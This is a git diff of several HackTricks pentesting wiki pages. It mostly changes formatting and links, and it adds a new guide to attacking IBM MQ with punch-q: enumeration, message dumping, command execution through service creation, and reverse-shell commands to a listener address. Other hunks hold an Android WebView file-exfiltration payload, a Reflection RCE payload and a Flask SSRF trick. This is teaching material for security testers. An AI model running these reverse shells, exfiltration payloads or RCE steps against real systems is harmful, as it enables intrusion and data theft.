 * If necessary for legacy reasons (e.g. having to support older devices), **at least set the minimal API level to 17** in the manifest file of the app (`<uses-sdk android:minSdkVersion="17" />`).
 
-## Javascript Bridge to RCE via Reflection
+### Javascript Bridge to RCE via Reflection
 
 As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
 
@@ -137,7 +148,7 @@ execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
 However modern applications may use the **`@JavascriptInterface` annotation** that indicates to the JavascriptBridge that **only** the method with this annotation should be **exposed**.\
 In that scenario, you won't be able to abuse Reflection to execute arbitrary code.
 
-## Remote Debugging
+### Remote Debugging
 
 **Remote WebView** **debugging** allow to access the webview with the **Chrome Developer Tools.**\
 The **device** needs to be **accessible** by the PC (via USB, local emulator, local network...) and running the debuggable WebView, then access **chrome://inspect/#devices**:
@@ -169,9 +180,9 @@ if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
 }
 ```
 
-# Payloads
+## Payloads
 
-## Exfiltrate arbitrary files
+### Exfiltrate arbitrary files
 
 ```javascript
 var xhr = new XMLHttpRequest();
@@ -184,28 +195,20 @@ xhr.open('GET', 'file:///data/data/com.authenticationfailure.wheresmybrowser/dat
 xhr.send(null);
 ```
 
-# References
+## References
 
 {% embed url="https://github.com/authenticationfailure/WheresMyBrowser.Android" %}
 
 {% embed url="https://developer.android.com/reference/android/webkit/WebView" %}
 
-
-
 <details>
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
-
-

mobile-pentesting/xamarin-apps.md

@@ -36,7 +36,7 @@ It runs along with the Objective-C Runtime. The runtime environments run on top
 
 The below-given diagram depicts this architecture:
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 ### What is .Net Runtime and Mono Framework?
 
@@ -70,7 +70,7 @@ If you encounter a Full AOT compiled application, and if the IL Assembly files a
 
 Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
 
-<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
 

network-services-pentesting/1414-pentesting-ibmmq.md

@@ -0,0 +1,371 @@
+# 1414 - Pentesting IBM MQ
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+
+</details>
+
+## Basic information
+
+IBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers.
+
+By default, **it exposes IBM MQ TCP port 1414**.
+Sometimes, HTTP REST API can be exposed on port **9443**.
+Metrics (Prometheus) could also be accessed from TCP port **9157**.
+
+The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but **also to control the instance**.
+
+IBM provides a large technical documentation available on [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
+
+## Tools
+
+A suggested tool for easy exploitation is **[punch-q](https://github.com/sensepost/punch-q)**, with Docker usage. The tool is actively using the Python library `pymqi`.
+
+For a more manual approach, use the Python library **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) are needed.
+
+### Installing pymqi
+
+**IBM MQ dependencies** needs to be installed and loaded:
+
+1. Create an account (IBMid) on [https://login.ibm.com/](https://login.ibm.com/).
+2. Download IBM MQ libraries from [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). For Linux x86_64 it is **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
+3. Decompress (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
+4. Run `sudo ./mqlicense.sh` to accept licenses terms.
+
+>If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110):
+>
+>```bash
+>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ] 
+>  then 
+>    echo "ERROR: This package is incompatible with this system"
+>    echo "       This package was built for ${BUILD_PLATFORM}"
+>    exit 1
+>fi
+>```
+
+5. Install these packages:
+
+```bash
+sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
+sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
+sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
+```
+
+6. Then, temporary add the `.so` files to LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **before** running other tools using these dependencies.
+
+Then, you can clone the project [**pymqi**](https://github.com/dsuch/pymqi): it contains interesting code snippets, constants, ... Or you can directly install the library with: `pip install pymqi`.
+
+### Using punch-q
+
+#### With Docker
+
+Simply use: `sudo docker run --rm -ti leonjza/punch-q`.
+
+#### Without Docker
+
+Clone the project [**punch-q**](https://github.com/sensepost/punch-q) then follow the readme for installation (`pip install -r requirements.txt && python3 setup.py install`).
+
+After, it can be used with `punch-q` command.
+
+## Enumeration
+
+You can try to enumerate the **queue manager name, the users, the channels and the queues** with **punch-q** or **pymqi**.
+
+### Queue Manager
+
+Sometimes, there is no protection against getting the Queue Manager name:
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
+Queue Manager name: MYQUEUEMGR
+```
+
+### Channels
+
+**punch-q** is using an internal (modifiable) wordlist to find existing channels. Usage example:
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
+"DEV.ADMIN.SVRCONN" exists and was authorised.
+"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
+"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
+```
+
+It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so `--username / --password` is not needed. Of course, access rights can also vary.
+
+As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels. 
+
+The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**:
+
+```python
+import logging
+import pymqi
+
+logging.basicConfig(level=logging.INFO)
+
+queue_manager = 'MYQUEUEMGR'
+channel = 'DEV.ADMIN.SVRCONN'
+host = '172.17.0.2'
+port = '1414'
+conn_info = '%s(%s)' % (host, port)
+user = 'admin'
+password = 'passw0rd'
+
+prefix = '*'
+
+args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
+
+qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
+pcf = pymqi.PCFExecute(qmgr)
+
+try:
+    response = pcf.MQCMD_INQUIRE_CHANNEL(args)
+except pymqi.MQMIError as e:
+    if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
+        logging.info('No channels matched prefix `%s`' % prefix)
+    else:
+        raise
+else:
+    for channel_info in response:
+        channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
+        logging.info('Found channel `%s`' % channel_name)
+
+qmgr.disconnect()
+
+```
+
+... But **punch-q** also embed that part (with more infos!). 
+It can be launch with:
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
+Showing channels with prefix: "*"...
+
+| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
+|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
+| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
+| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
+| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
+| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
+| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
+| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
+| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
+| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
+| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
+| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
+| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
+| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
+| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
+```
+
+### Queues
+
+There is a code snippet with **pymqi** (`dis_queues.py`) but **punch-q** permits to retrieve more pieces of info about the queues: 
+
+```bash
+ ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
+Showing queues with prefix: "*"...
+| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
+|           |                      |        |         |        | GR Name | eue Nam |                                   |
+|           |                      |        |         |        |         | e       |                                   |
+|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
+| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
+| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
+| 9         |                      |        |         |        |         |         |                                   |
+| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
+| 0 18.35.1 |                      |        |         |        |         |         |                                   |
+| 9         |                      |        |         |        |         |         |                                   |
+| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
+| 0 18.35.1 |                      |        |         |        |         |         |                                   |
+| 9         |                      |        |         |        |         |         |                                   |
+| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
+| 0 18.35.1 |                      |        |         |        |         |         |                                   |
+| 9         |                      |        |         |        |         |         |                                   |
+# Truncated
+```
+
+## Exploit
+
+### Dump messages
+
+You can target queue(s)/channel(s) to sniff out / dump messages from them (non-destructive operation). *Examples:*
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
+```
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
+```
+
+**Do not hesitate to iterate on all identified queues.**
+
+### Code execution
+
+> Some details before continuing: IBM MQ can be controlled though multiple ways: MQSC, PCF, Control Command. Some general lists can be found in [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).  
+> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Programmable Command Formats***) is what we are focused on to interact remotely with the instance. **punch-q** and furthermore **pymqi** are based on PCF interactions.
+> 
+> You can find a list of PCF commands:
+> * [From PCF documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), and
+> * [from constants](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
+> 
+> One interesting command is `MQCMD_CREATE_SERVICE` and its documentation is available [here](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). It takes as argument a `StartCommand` pointing to a local program on the instance (example: `/bin/sh`).
+>
+> There is also a warning of the command in the docs: *"Attention: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."*
+> 
+> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
+
+The service creation / deletion with PCF for remote program execution can be done by **punch-q**:
+
+**Example 1**
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
+```
+
+> In the logs of IBM MQ, you can read the command is successfully executed:
+> 
+> ```bash
+> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
+> ```
+
+You can also enumerate existing programs on the machine (here `/bin/doesnotexist` ... does not exist):
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
+s "whatever"
+Command: /bin/doesnotexist
+Arguments: -c id
+Service Name: 6e3ef5af652b4436
+
+Creating service...
+Starting service...
+The program '/bin/doesnotexist' is not available on the remote system.
+Giving the service 0 second(s) to live...
+Cleaning up service...
+Done
+```
+
+**Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit** ***(listener for reverse shell, file creation on different service, data exfiltration through network ...)***
+
+**Example 2**
+
+For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
+
+* One with bash
+* One with perl
+
+*Of course you can build a custom one with the `execute` command.*
+
+For bash:
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
+```
+
+For perl:
+
+```bash
+❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
+```
+
+### Custom PCF
+
+You can dig into the IBM MQ documentation and directly use **pymqi** python library to test specific PCF command not implemented in **punch-q**.
+
+**Example:**
+
+```python
+import pymqi
+
+queue_manager = 'MYQUEUEMGR'
+channel = 'DEV.ADMIN.SVRCONN'
+host = '172.17.0.2'
+port = '1414'
+conn_info = '%s(%s)' % (host, port)
+user = 'admin'
+password = 'passw0rd'
+
+qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
+pcf = pymqi.PCFExecute(qmgr)
+
+try:
+    # Replace here with your custom PCF args and command
+    # The constants can be found in pymqi/code/pymqi/CMQCFC.py
+    args = {pymqi.CMQCFC.xxxxx: "value"}
+    response = pcf.MQCMD_CUSTOM_COMMAND(args)
+except pymqi.MQMIError as e:
+    print("Error")
+else:
+    # Process response
+
+qmgr.disconnect()
+
+```
+
+If you cannot find the constant names, you can refer to the [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors). 
+
+> *Example for [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). It needs the parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) which can be `*` (Doc: ):*
+> 
+> ```python
+> import pymqi
+> 
+> queue_manager = 'MYQUEUEMGR'
+> channel = 'DEV.ADMIN.SVRCONN'
+> host = '172.17.0.2'
+> port = '1414'
+> conn_info = '%s(%s)' % (host, port)
+> user = 'admin'
+> password = 'passw0rd'
+> 
+> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
+> pcf = pymqi.PCFExecute(qmgr)
+> 
+> try:
+>     args = {2029: "*"}
+>     response = pcf.MQCMD_REFRESH_CLUSTER(args)
+> except pymqi.MQMIError as e:
+>     print("Error")
+> else:
+>     print(response)
+> 
+> qmgr.disconnect()
+> ```
+
+## Testing environment
+
+If you want to test the IBM MQ behavior and exploits, you can set up a local environment based on Docker:
+
+1. Having an account on ibm.com and cloud.ibm.com.
+2. Create a containerized IBM MQ with:
+
+```bash
+sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
+sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
+```
+
+By default, the authentication is enabled, the username is `admin` and the password is `passw0rd` (Environment variable `MQ_ADMIN_PASSWORD`).
+Here, the queue manager name has been set to `MYQUEUEMGR` (variable `MQ_QMGR_NAME`).
+
+You should have the IBM MQ up and running with its ports exposed:
+
+```bash
+❯ sudo docker ps
+CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
+58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq
+```
+
+> The old version of IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/.
+
+## References
+
+* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
+* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
+* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)

network-services-pentesting/15672-pentesting-rabbitmq-management.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -60,7 +60,7 @@ Content-Length: 267
 
 * `port:15672 http`
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-dns.md

@@ -152,11 +152,15 @@ dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive
 
 ### Active Directory servers
 
-```
+```bash
 dig -t _gc._tcp.lab.domain.com
 dig -t _ldap._tcp.lab.domain.com
 dig -t _kerberos._tcp.lab.domain.com
 dig -t _kpasswd._tcp.lab.domain.com
+
+nslookup -type=srv _kerberos._tcp.<CLIENT_DOMAIN>
+nslookup -type=srv _kerberos._tcp.domain.com
+
 nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.com'"
 ```
 

network-services-pentesting/pentesting-ftp/README.md

@@ -158,6 +158,12 @@ wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
 wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all
 ```
 
+If your user/password has special characters, the [following command](https://stackoverflow.com/a/113900/13647948) can be used:
+
+```bash
+wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
+```
+
 ## Some FTP commands
 
 * **`USER username`**

network-services-pentesting/pentesting-smb.md

@@ -538,7 +538,7 @@ Entry_3:
 Entry_4:
   Name: Nmap Smb Scan 2
   Description: SMB Vuln Scan With Nmap (Less Specific)
-  Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
+  Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
 
 Entry_5:
   Name: Hydra Brute Force

network-services-pentesting/pentesting-ssh.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -313,7 +313,7 @@ id_rsa
 * You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
 * [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
 
-<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-web/403-and-401-bypasses.md

@@ -131,6 +131,7 @@ guest    guest
 * [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
 * [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)
 * [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
+* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
 
 <figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
 

network-services-pentesting/pentesting-web/README.md

@@ -116,7 +116,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**WebDav**](put-method-webdav.md)
 * [**Werkzeug**](werkzeug.md)
 * [**Wordpress**](wordpress.md)
-* [**Electron Desktop (XSS to RCE)**](xss-to-rce-electron-desktop-apps/)
+* [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/)
 
 _Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._\
 If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks (and let me know!).

network-services-pentesting/pentesting-web/electron-desktop-apps/README.md

@@ -1,4 +1,4 @@
-# XSS to RCE Electron Desktop Apps
+# Electron Desktop Apps
 
 <details>
 
@@ -112,6 +112,14 @@ Modify the start-main configuration and add the use of a proxy such as:
 "start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
 ```
 
+## Electron Local Code Injection
+
+If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in:
+
+{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
+[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
+{% endcontent-ref %}
+
 ## RCE: XSS + nodeIntegration
 
 If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:

network-services-pentesting/pentesting-web/flask.md

@@ -14,7 +14,7 @@
 
 <figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@@ -87,9 +87,40 @@ Command line tool to brute-force websites using cookies crafted with flask-unsig
 
 [**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
 
+## Flask Proxy to SSRF
+
+[**In this writeup**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) it's explained how Flask allows a request starting with the charcter "@":
+
+```http
+GET @/ HTTP/1.1
+Host: target.com
+Connection: close
+```
+
+Which in the following scenario:
+
+```python
+from flask import Flask
+from requests import get
+
+app = Flask('__main__')
+SITE_NAME = 'https://google.com/'
+
+@app.route('/', defaults={'path': ''})
+@app.route('/<path:path>')
+def proxy(path):
+  return get(f'{SITE_NAME}{path}').content
+
+app.run(host='0.0.0.0', port=8080)
+```
+
+Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
+
+
+
